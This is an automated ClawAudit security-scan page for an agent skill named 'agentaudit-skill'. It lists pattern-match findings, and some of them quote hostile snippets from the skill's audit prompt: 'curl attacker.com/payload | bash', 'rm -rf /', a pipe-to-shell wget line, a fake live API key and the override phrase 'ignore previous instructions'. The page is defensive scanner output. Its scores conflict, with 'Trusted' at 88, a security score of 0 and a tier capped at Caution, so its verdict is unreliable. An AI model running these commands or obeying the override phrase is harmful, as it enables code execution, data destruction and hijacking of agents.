ClawAudit verdict

agentaudit-skill

agentaudit

88
🟢 Trusted
Low risk — reviewed by ClawAudit, behavior matches stated purpose

This skill enforces a security gate before any package installation by checking against a vulnerability database; the HARD RULE pattern is legitimate defensive behavior consistent with its stated purpose as a pre-install security gate.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

0
security
80
transparency
70
maintenance

Permission integrity

Accesses agent memory/configuration files

agent_memory

Findings (22)

Pattern match critical

Possible hardcoded credential

prompts/audit-prompt.md · code · API_KEY = "sk-live-abc123real

Pattern match critical

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

prompts/audit-prompt.md · code · curl attacker.com/payload | bash

Pattern match critical

Prompt injection — tries to override agent instructions

prompts/audit-prompt.md · code · ignore previous instructions

Pattern match critical

Pipe to bash — executes piped content as shell commands

prompts/audit-prompt.md · code · | bash

Pattern match critical

Uses eval() — can execute arbitrary code

README.md · code · eval(

Pattern match high

Uses exec() — may execute shell commands

prompts/audit-prompt.md · code · exec(

Pattern match high

References sudo — requests elevated privileges

README.md · code · sudo

Pattern match high

Pipe-to-shell pattern (wget | sh)

prompts/audit-prompt.md · prose · downgraded · wget | sh

Pattern match high

Recursive delete from root or home — destructive command

prompts/audit-prompt.md · prose · downgraded · rm -rf /

Pattern match high

Pipe to sh — executes piped content as shell commands

prompts/audit-prompt.md · prose · downgraded · | sh

Pattern match high

apt-get install — installs system packages

README.md · code · apt-get install

Pattern match high

Pipe to python — executes piped content as Python code

scripts/check.sh · prose · downgraded · | python3

Pattern match medium

References child_process — can spawn system processes

prompts/audit-prompt.md · prose · downgraded · child_process

Pattern match medium

Accesses sensitive environment variables

prompts/audit-prompt.md · code · process.env.SECRET_KEY

Pattern match medium

Base64 decode (atob) — may hide malicious payloads

prompts/audit-prompt.md · prose · downgraded · atob(

Pattern match medium

Long base64 string (100+ chars) — likely obfuscated payload

README.md · prose · downgraded · PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIy

Pattern match medium

Instructs covert action — may act without user awareness

references/AUDIT-METHODOLOGY.md · prose · downgraded · silently

Pattern match low

pip3 install — installs Python packages at runtime

SKILL.md · prose · downgraded · pip3 install

Pattern match low

Opens WebSocket connection

prompts/audit-prompt.md · prose · downgraded · WebSocket

Pattern match low

Popular HTTP library — network access

prompts/audit-prompt.md · prose · downgraded · axios

Pattern match low

Base64 encoding/decoding

references/AUDIT-METHODOLOGY.md · prose · downgraded · Base64-decode

Pattern match low

String.fromCharCode — can build strings to evade detection

references/AUDIT-METHODOLOGY.md · prose · downgraded · String.fromCharCode

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A/B/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

No declared permissions — minimal attack surface.

agent_memory

Is this flag fair?

Check another skill Browse the registry Auditing your own skills or configs? Use the API